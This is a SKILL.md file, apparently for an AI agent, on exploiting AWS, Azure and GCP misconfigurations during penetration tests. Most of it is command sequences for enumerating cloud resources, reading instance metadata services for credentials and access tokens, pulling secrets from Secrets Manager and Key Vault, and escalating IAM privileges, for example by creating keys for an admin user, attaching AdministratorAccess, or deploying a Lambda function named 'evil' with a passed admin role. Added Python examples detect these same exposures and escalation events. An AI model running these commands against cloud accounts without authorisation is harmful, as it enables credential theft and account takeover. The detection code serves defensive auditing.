skills/cloud-security/SKILL.md
Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.
AWS Authentication:
```bash
# Configure credentials
aws configure
# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1
# Test credentials
aws sts get-caller-identity
# List available regions
aws ec2 describe-regions
```

S3 Enumeration:
```bash
# List buckets
aws s3 ls
# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive
# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/
# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/
```
S3 Bucket Discovery:
```bash
# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets
# Tools
# s3scanner
python3 s3scanner.py buckets.txt
# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt
```
IAM Enumeration:
```bash
# Current user info
aws sts get-caller-identity
# List IAM users (if allowed)
aws iam list-users
# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username
# Get policy details (DefaultVersionId in the get-policy output tells you which version to fetch)
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/PolicyName --version-id v1
# List roles
aws iam list-roles
# List groups
aws iam list-groups
```
EC2 Enumeration:
```bash
# List instances
aws ec2 describe-instances
# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
# List security groups
aws ec2 describe-security-groups
# List key pairs
aws ec2 describe-key-pairs
# List snapshots
aws ec2 describe-snapshots --owner-ids self
# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all
```
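The metadata and security-group commands above are what an assessor runs; the check a defender runs over the same data is whether an instance still answers IMDSv1 (so any SSRF or local process can read the role credentials at 169.254.169.254) and whether a security group opens an admin port to the world. This is an added example, not code from the skill: it evaluates the JSON shapes that `aws ec2 describe-instances` and `aws ec2 describe-security-groups` print, on constructed sample data, and prints the `modify-instance-metadata-options` remediation for each IMDSv1 instance.

```python
"""Audit EC2 metadata options and security groups for two exposures:
instances still accepting IMDSv1 and groups open to the internet on admin
ports.  Added example, not part of the original skill; the input shapes
follow the describe-instances / describe-security-groups JSON and the data
below is constructed."""

ADMIN_PORTS = {22, 3389}            # SSH, RDP
WORLD_CIDRS = {"0.0.0.0/0", "::/0"}

# Constructed sample: one IMDSv1 instance, one hardened, one with IMDS off.
SAMPLE_INSTANCES = {"Reservations": [{"Instances": [
    {"InstanceId": "i-0a1b2c3d4e5f60001",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0a1b2c3d4e5f60002",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0a1b2c3d4e5f60003",
     "MetadataOptions": {"HttpEndpoint": "disabled"}},
]}]}

SAMPLE_SGS = {"SecurityGroups": [
    {"GroupId": "sg-0111", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}]},
    {"GroupId": "sg-0222", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
         "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []},
        # protocol -1 = all traffic; AWS omits FromPort/ToPort on such rules
        {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}]},
]}


def imdsv1_instances(describe_instances):
    """Instances whose metadata service does not require a session token
    (IMDSv1 reachable) or allows more than one hop (containers on the host
    can reach it).  Returns [(instance_id, [reasons])]."""
    findings = []
    for reservation in describe_instances.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint", "enabled") == "disabled":
                continue                      # IMDS off: nothing to read
            reasons = []
            if opts.get("HttpTokens") != "required":
                reasons.append("IMDSv1 allowed")
            if opts.get("HttpPutResponseHopLimit", 1) > 1:
                reasons.append("hop limit %d" % opts["HttpPutResponseHopLimit"])
            if reasons:
                findings.append((inst["InstanceId"], reasons))
    return findings


def world_open_admin_ports(describe_sgs):
    """Ingress rules exposing an admin port (or all ports) to 0.0.0.0/0 or ::/0.
    Returns [(group_id, port, cidr)]."""
    findings = []
    for sg in describe_sgs.get("SecurityGroups", []):
        for perm in sg.get("IpPermissions", []):
            lo, hi = perm.get("FromPort"), perm.get("ToPort")
            if perm.get("IpProtocol") == "-1" or lo is None:
                ports = ADMIN_PORTS                      # every port is open
            else:
                ports = {p for p in ADMIN_PORTS if lo <= p <= hi}
            if not ports:
                continue
            cidrs = [r["CidrIp"] for r in perm.get("IpRanges", [])]
            cidrs += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
            for cidr in cidrs:
                if cidr in WORLD_CIDRS:
                    findings.extend((sg["GroupId"], p, cidr) for p in sorted(ports))
    return findings


def imdsv2_remediation(instance_id):
    """CLI command that enforces IMDSv2 and a single hop on one instance."""
    return ("aws ec2 modify-instance-metadata-options --instance-id %s "
            "--http-tokens required --http-put-response-hop-limit 1" % instance_id)


if __name__ == "__main__":
    for instance_id, reasons in imdsv1_instances(SAMPLE_INSTANCES):
        print(instance_id, ", ".join(reasons), "->", imdsv2_remediation(instance_id))
    for group_id, port, cidr in world_open_admin_ports(SAMPLE_SGS):
        print("%s: port %d open to %s" % (group_id, port, cidr))
```

Feed it the real output by loading the JSON from `aws ec2 describe-instances` and `aws ec2 describe-security-groups`; the hop-limit check matters because a limit above 1 lets a container on the host reach the metadata endpoint even when the instance itself is hardened.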
Lambda Enumeration:
```bash
# List functions
aws lambda list-functions
# Get function code
aws lambda get-function --function-name function-name
# Invoke function
aws lambda invoke --function-name function-name output.txt
# Get function configuration
aws lambda get-function-configuration --function-name function-name
```

RDS Enumeration:
```bash
# List DB instances
aws rds describe-db-instances
# List DB snapshots
aws rds describe-db-snapshots
# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'
```

Secrets Manager:
```bash
# List secrets
aws secretsmanager list-secrets
# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name
```

CloudTrail:
```bash
# Check if CloudTrail is enabled
aws cloudtrail describe-trails
# Check trail status
aws cloudtrail get-trail-status --name trail-name
# Get recent events
aws cloudtrail lookup-events
```
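`lookup-events` is also where the IAM privilege-escalation calls listed further down this page (CreatePolicyVersion, SetDefaultPolicyVersion, AttachUserPolicy, PutUserPolicy, CreateAccessKey, UpdateAssumeRolePolicy, and a Lambda CreateFunction with a passed role) show up after the fact. The detection logic below is an added example, not code from the skill: it triages CloudTrail records for those calls and attaches the context a responder wants (caller, whether the target principal is someone else, AdministratorAccess, denied attempts). The records are constructed in the shape of the `CloudTrailEvent` JSON that `lookup-events` returns; the account id is the placeholder already used on this page.

```python
"""Detect IAM privilege-escalation API calls in CloudTrail records.
Added example, not part of the original skill; SAMPLE_RECORDS is constructed."""
import json
import re

ACCOUNT = "123456789012"   # placeholder account id, as used elsewhere on this page

# (eventSource, eventName without API-version suffix) -> why it matters.
# Lambda event names carry a version suffix in CloudTrail, e.g. CreateFunction20150331.
ESCALATION_EVENTS = {
    ("iam.amazonaws.com", "CreatePolicyVersion"): "existing managed policy rewritten",
    ("iam.amazonaws.com", "SetDefaultPolicyVersion"): "policy rolled to another version",
    ("iam.amazonaws.com", "AttachUserPolicy"): "managed policy attached to a user",
    ("iam.amazonaws.com", "PutUserPolicy"): "inline policy added to a user",
    ("iam.amazonaws.com", "CreateAccessKey"): "new long-lived credential",
    ("iam.amazonaws.com", "UpdateAssumeRolePolicy"): "role trust policy changed",
    ("lambda.amazonaws.com", "CreateFunction"): "function created with a passed role",
}

SAMPLE_RECORDS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "dev-user"},
     "requestParameters": {"userName": "admin-user"}},
    {"eventTime": "2024-01-01T10:01:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "IAMUser", "userName": "dev-user"},
     "requestParameters": {"userName": "dev-user",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventTime": "2024-01-01T10:02:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "CreateFunction20150331",
     "userIdentity": {"type": "IAMUser", "userName": "dev-user"},
     "requestParameters": {"functionName": "evil",
                           "role": "arn:aws:iam::%s:role/AdminRole" % ACCOUNT}},
    {"eventTime": "2024-01-01T10:03:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets",
     "userIdentity": {"type": "IAMUser", "userName": "dev-user"},
     "requestParameters": None},
    {"eventTime": "2024-01-01T10:04:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreatePolicyVersion", "errorCode": "AccessDenied",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::%s:assumed-role/DevRole/session1" % ACCOUNT},
     "requestParameters": {"policyArn": "arn:aws:iam::%s:policy/DevPolicy" % ACCOUNT,
                           "setAsDefault": True}},
]


def records_from_lookup_events(cli_output):
    """`aws cloudtrail lookup-events` wraps each record as a JSON string."""
    return [json.loads(e["CloudTrailEvent"]) for e in cli_output.get("Events", [])]


def actor_name(record):
    ident = record.get("userIdentity", {})
    return ident.get("userName") or ident.get("arn", "unknown")


def triage(record):
    """Return a finding dict for an escalation-relevant record, else None."""
    name = re.sub(r"\d+$", "", record["eventName"])      # strip version suffix
    reason = ESCALATION_EVENTS.get((record["eventSource"], name))
    if reason is None:
        return None
    params = record.get("requestParameters") or {}
    actor = actor_name(record)
    notes = [reason]
    target = params.get("userName") or params.get("roleName")
    if target and target != actor:
        notes.append("target principal '%s' differs from caller" % target)
    if str(params.get("policyArn", "")).endswith("/AdministratorAccess"):
        notes.append("AdministratorAccess attached")
    if params.get("setAsDefault") is True:
        notes.append("new version set as default immediately")
    if name == "CreateFunction" and params.get("role"):
        notes.append("passes role %s" % params["role"])
    if record.get("errorCode"):
        notes.append("DENIED (%s)" % record["errorCode"])  # failed attempts are still signal
    return {"time": record["eventTime"], "actor": actor,
            "event": record["eventName"], "notes": notes}


def scan(records):
    return [f for f in (triage(r) for r in records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding["time"], finding["actor"], finding["event"], "; ".join(finding["notes"]))
```

Denied calls are kept on purpose: an `AccessDenied` on `CreatePolicyVersion` from a developer role is a probe worth chasing even though nothing changed.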
Common Misconfigurations:
```bash
# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships
```

Exploitation Examples:
```bash
# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user
# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt
```
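The misconfiguration list above is the remediation checklist as much as the attack list: the fix is to find which policies grant those actions, including grants hidden behind `iam:Create*`, `iam:*`, `*` or `NotAction`. This static check is an added example, not code from the skill. It takes a policy document (the `Document` field from `aws iam get-policy-version`), expands wildcards the way IAM does, subtracts explicit `Deny` statements, and reports the PassRole + lambda:CreateFunction pair only when both halves are granted. `Resource` and `Condition` are deliberately ignored, so hits are triage leads rather than proof of exploitability; the policy documents are constructed.

```python
"""Flag IAM policy documents that grant privilege-escalation permissions.
Added example, not part of the original skill; the sample policies are constructed."""
import fnmatch

ESCALATION_ACTIONS = [
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:AttachUserPolicy", "iam:PutUserPolicy",
    "iam:CreateAccessKey", "iam:UpdateAssumeRolePolicy",
]
# Only dangerous in combination: both halves must be granted.
COMBINATIONS = {"iam:PassRole+lambda:CreateFunction": ("iam:PassRole", "lambda:CreateFunction")}
CANDIDATES = set(ESCALATION_ACTIONS) | {a for pair in COMBINATIONS.values() for a in pair}

POLICY_WILDCARD = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Resource": "*",
     "Action": ["iam:Create*", "iam:PassRole", "lambda:CreateFunction"]}]}
POLICY_DENY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Effect": "Deny", "Action": "iam:*", "Resource": "*"}]}
POLICY_NOTACTION = {"Version": "2012-10-17", "Statement":      # single statement object
    {"Effect": "Allow", "NotAction": ["s3:*", "ec2:*"], "Resource": "*"}}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matching(patterns):
    """Candidate actions matched by any IAM action pattern.  IAM matching is
    case-insensitive and '*' / '?' are its only wildcards."""
    hits = set()
    for pattern in _as_list(patterns):
        p = pattern.lower()
        hits |= {c for c in CANDIDATES if fnmatch.fnmatchcase(c.lower(), p)}
    return hits


def granted_candidates(doc):
    """Candidates granted by Allow statements and not removed by an explicit Deny."""
    allowed, denied = set(), set()
    for stmt in _as_list(doc.get("Statement")):
        if "NotAction" in stmt:
            covered = CANDIDATES - _matching(stmt["NotAction"])   # everything except these
        else:
            covered = _matching(stmt.get("Action"))
        if stmt.get("Effect") == "Allow":
            allowed |= covered
        elif stmt.get("Effect") == "Deny":
            denied |= covered
    return allowed - denied


def escalation_findings(doc):
    """Escalation actions granted, plus any dangerous combination fully granted."""
    granted = granted_candidates(doc)
    findings = [a for a in ESCALATION_ACTIONS if a in granted]
    findings += [name for name, pair in COMBINATIONS.items()
                 if all(a in granted for a in pair)]
    return findings


if __name__ == "__main__":
    for label, doc in (("wildcard", POLICY_WILDCARD), ("deny", POLICY_DENY),
                       ("notaction", POLICY_NOTACTION)):
        print(label, escalation_findings(doc))
```

Run it over every version returned by `aws iam list-policy-versions`, not only the default: `SetDefaultPolicyVersion` escalates precisely by reviving an older, broader version.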
Azure Authentication:
```bash
# Login
az login
# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID
# Get current account
az account show
# List subscriptions
az account list
```

Blob Storage Enumeration:
```bash
# List storage accounts
az storage account list
# List containers
az storage container list --account-name accountname
# List blobs
az storage blob list --container-name containername --account-name accountname
# Download blob
az storage blob download --container-name containername --name filename --account-name accountname
# Check public access
az storage container show --name containername --account-name accountname
# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file
```
Blob Discovery:
```bash
# Common patterns
companyname
companyname-backup
companyname-data
companyname-files
# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company
```
VM Enumeration:
```bash
# List VMs
az vm list
# List VM images
az vm image list
# Get VM details
az vm show --resource-group RG --name VMname
# List NICs
az network nic list
# List public IPs
az network public-ip list
```

Azure AD Enumeration:
```bash
# List users
az ad user list
# Get current user
az ad signed-in-user show
# List groups
az ad group list
# List service principals
az ad sp list
# List applications
az ad app list
```

Function Apps:
```bash
# List function apps
az functionapp list
# Get function app details
az functionapp show --name functionappname --resource-group RG
# List functions
az functionapp function list --name functionappname --resource-group RG
# Download function code: `deployment source config-zip` uploads a package, it does not
# download one. Fetch the deployed tree through the Kudu SCM zip endpoint instead, using
# the app's publishing credentials.
az functionapp deployment list-publishing-credentials --name functionappname --resource-group RG
curl -u 'DEPLOY_USER:DEPLOY_PASSWORD' "https://functionappname.scm.azurewebsites.net/api/zip/site/wwwroot/" -o wwwroot.zip
```

Key Vault:
```bash
# List key vaults
az keyvault list
# List secrets
az keyvault secret list --vault-name vaultname
# Get secret
az keyvault secret show --name secretname --vault-name vaultname
```

Azure Metadata Service:
```bash
# From Azure VM (the Metadata:true header is mandatory, which is what blocks naive SSRF)
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Get access token for the VM's managed identity
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```
GCP Authentication:
```bash
# Login
gcloud auth login
# Login with service account
gcloud auth activate-service-account --key-file=key.json
# Get current account
gcloud config list
# List projects
gcloud projects list
```

Cloud Storage Enumeration:
```bash
# List buckets
gsutil ls
# List bucket contents
gsutil ls gs://bucket-name/
# Download files
gsutil cp gs://bucket-name/file.txt ./
# Check bucket permissions
gsutil iam get gs://bucket-name/
# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt
```
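Each cloud section above has a "check public access" step (`aws s3api get-bucket-policy` / `get-bucket-acl`, `az storage container show`, `gsutil iam get`), and the unauthenticated `curl` only confirms what those settings already say. The checker below is an added example, not code from the skill, that evaluates all three outputs for anonymous or all-authenticated access: S3 policy statements whose principal is `*` and whose `Condition` does not narrow it to a VPC, IP range, organisation or account, S3 ACL grants to the AllUsers/AuthenticatedUsers groups, the container `publicAccess` level (shape assumed from the `az` JSON output), and GCS bindings to `allUsers`/`allAuthenticatedUsers`. All inputs are constructed, not captured from a real account.

```python
"""Cross-cloud storage public-exposure check.  Added example, not part of the
original skill; every sample input below is constructed."""
import json

S3_PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anonymous",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}
# Condition keys that pin a '*' principal to something narrower than the internet.
NARROWING_KEYS = {"aws:sourcevpc", "aws:sourcevpce", "aws:sourceip",
                  "aws:principalorgid", "aws:principalaccount", "aws:principalarn"}
GCS_PUBLIC_MEMBERS = {"allUsers": "anonymous", "allAuthenticatedUsers": "any Google account"}

# get-bucket-policy returns the document as a JSON string under "Policy".
SAMPLE_S3_POLICY_OUTPUT = {"Policy": json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::company-assets/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:GetObject", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::company-assets", "arn:aws:s3:::company-assets/*"],
     "Condition": {"StringEquals": {"aws:SourceVpc": "vpc-0example"}}}]})}
SAMPLE_S3_ACL = {"Owner": {"ID": "OWNER_CANONICAL_ID"}, "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "OWNER_CANONICAL_ID"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"}]}
SAMPLE_AZ_CONTAINER = {"name": "companyname-files",
                       "properties": {"publicAccess": "blob", "lease": {"status": "unlocked"}}}
SAMPLE_GCS_POLICY = {"bindings": [
    {"role": "roles/storage.admin", "members": ["user:alice@example.com"]},
    {"role": "roles/storage.objectViewer", "members": ["allUsers"]}], "etag": "CAE="}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def load_bucket_policy(cli_output):
    return json.loads(cli_output["Policy"])


def _principal_is_public(principal):
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def s3_policy_findings(policy):
    """Allow statements open to everyone: (Sid, [actions])."""
    out = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _principal_is_public(stmt.get("Principal")):
            continue
        keys = {k.lower() for op in (stmt.get("Condition") or {}).values() for k in op}
        if keys & NARROWING_KEYS:
            continue                              # '*' but fenced to a VPC/IP/org
        out.append((stmt.get("Sid", "<no Sid>"), _as_list(stmt.get("Action", []))))
    return out


def s3_acl_findings(acl):
    """ACL grants to the public groups: (who, permission)."""
    return [(S3_PUBLIC_GRANTEES[g["Grantee"]["URI"]], g["Permission"])
            for g in acl.get("Grants", [])
            if g["Grantee"].get("Type") == "Group" and g["Grantee"].get("URI") in S3_PUBLIC_GRANTEES]


def azure_container_public(container):
    """'blob' lets anonymous users read known blobs; 'container' also lets them list."""
    level = (container.get("properties") or {}).get("publicAccess")
    return level if level in ("blob", "container") else None


def gcs_policy_findings(policy):
    """Bindings granting a role to everyone: (who, role)."""
    return [(GCS_PUBLIC_MEMBERS[m], b["role"]) for b in policy.get("bindings", [])
            for m in b.get("members", []) if m in GCS_PUBLIC_MEMBERS]


if __name__ == "__main__":
    print("S3 policy:", s3_policy_findings(load_bucket_policy(SAMPLE_S3_POLICY_OUTPUT)))
    print("S3 ACL:", s3_acl_findings(SAMPLE_S3_ACL))
    print("Azure container:", azure_container_public(SAMPLE_AZ_CONTAINER))
    print("GCS IAM:", gcs_policy_findings(SAMPLE_GCS_POLICY))
```

The S3 policy check is the one that needs judgement: a `Principal: "*"` statement fenced by `aws:SourceVpc` or `aws:PrincipalOrgID` is not internet-facing, which is why the condition keys are inspected before a statement is reported.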
Bucket Discovery:
```bash
# Common patterns
company-backup
company-data
company_backup
company_data
# GCPBucketBrute
python3 gcpbucketbrute.py -k company
```
Compute Engine Enumeration:
```bash
# List instances
gcloud compute instances list
# Get instance details
gcloud compute instances describe instance-name --zone=zone
# List disks
gcloud compute disks list
# List snapshots
gcloud compute snapshots list
# List firewall rules
gcloud compute firewall-rules list
```

GCP IAM Enumeration:
```bash
# List service accounts
gcloud iam service-accounts list
# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID
# List roles
gcloud iam roles list
# Describe role
gcloud iam roles describe roles/editor
```

Cloud Functions:
```bash
# List functions
gcloud functions list
# Describe function
gcloud functions describe function-name --region=region
# Download source code (if accessible; sourceArchiveUrl is populated for 1st-gen functions)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"
```

GCP Metadata Service:
```bash
# From GCP VM (the Metadata-Flavor header is mandatory, which is what blocks naive SSRF)
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"
# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"
```
Tools:

AWS:
```bash
# Pacu - AWS exploitation framework
python3 pacu.py
# ScoutSuite - Security auditing
python3 scout.py aws
# Prowler - Security assessment
./prowler -M csv
# WeirdAAL - AWS attack library
python3 weirdAAL.py
```

Azure:
```powershell
# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains
```
```bash
# ScoutSuite
python3 scout.py azure
# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui
```

GCP:
```bash
# ScoutSuite
python3 scout.py gcp
# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths
```
AWS:
Azure:
GCP: